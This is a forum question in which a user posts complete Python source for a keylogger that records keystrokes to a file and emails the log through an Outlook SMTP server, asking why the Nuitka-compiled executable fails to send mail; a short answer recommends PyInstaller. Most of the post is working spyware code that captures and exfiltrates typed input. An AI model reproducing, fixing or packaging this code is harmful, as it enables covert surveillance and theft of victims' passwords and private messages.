# Python .exe keylogger file not sending email

Tags: python, security, executable, keylogger, nuitka

I created a keylogger which captures keystrokes and sends the keystrokes file to an email address specified. The python script when run from VS code terminal works perfectly, but when I compiled the files into an executable(.exe) using **nuitka** and execute the .exe file by double-clicking on the .exe file, the keylogger captures the keystrokes but does **not** send the email. What can I do to fix this?

```
from pynput.keyboard import Listener, Key
from decrypt import decrypt                                          
from encrypt import encrypt
from sendoulook import send_mail


decrypt()                                                           

count = 0

def on_press(key):
    global count
    letter = str(key)
    letter = letter.replace("'","") 
    special_keys(letter)
    count += 1
    if count == 10000000:
        return False

def special_keys(letter):
    if letter == "Key.space":
        letter = " "

    if letter == "Key.enter":
        letter = "\n"

    if letter.find("Key") == -1:
        with open("log.txt","a") as f:
            f.write(letter)
        
   

def on_release(key):
    if key == Key.esc:
        f = open("log.txt","a")
        f.write("\n")
        return False
        

with Listener(on_press=on_press, on_release=on_release) as l:
    l.join()


encrypt()                                      

try:
    if __name__ == "__main__":
        send_mail()

except Exception as error:
    print(error)
```

**THIS IS THE CODE FOR THE sendmail() function**

```
import smtplib
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from email.mime.base import MIMEBase
from email import encoders
from decouple import config
from retry import retry


@retry((Exception), tries=3, delay=2,backoff=2)         

def send_mail():

    if __name__ == "sendoutlook":

        fromaddr = "example@outlook.com"

        toaddr = "example@gmail.com"

        password = config("PASS")

        msg = MIMEMultipart()           

        msg["From"] = fromaddr         

        msg["To"] = toaddr

        msg["Subject"] = "Keylog Strokes"

        body = "This file contains the recorded keystrokes."

        msg.attach(MIMEText(body,"plain"))     

        filename = "log.txt"
        attachment = open("log.txt","rb")

        p = MIMEBase("application","octet-stream")    

        p.set_payload((attachment).read())   

        encoders.encode_base64(p)      

        p.add_header("Content-Disposition","attachment;filename=%s"%filename)  

        msg.attach(p)      

        s = smtplib.SMTP("smtp.office365.com",587)   

        s.starttls()     

        s.login(fromaddr,password)     

        text = msg.as_string()        

        s.sendmail(fromaddr,toaddr,text)

        s.quit
```

**nuitka command **

python -m nuitka --mingw64 <main.py> --standalone --onefile

Answer (score 0):

So, nuitka doesn't compile python scripts effectively,  thus not allowing the .exe file to send the email specified in your code. I suggest you try pyinstaller and see if that works.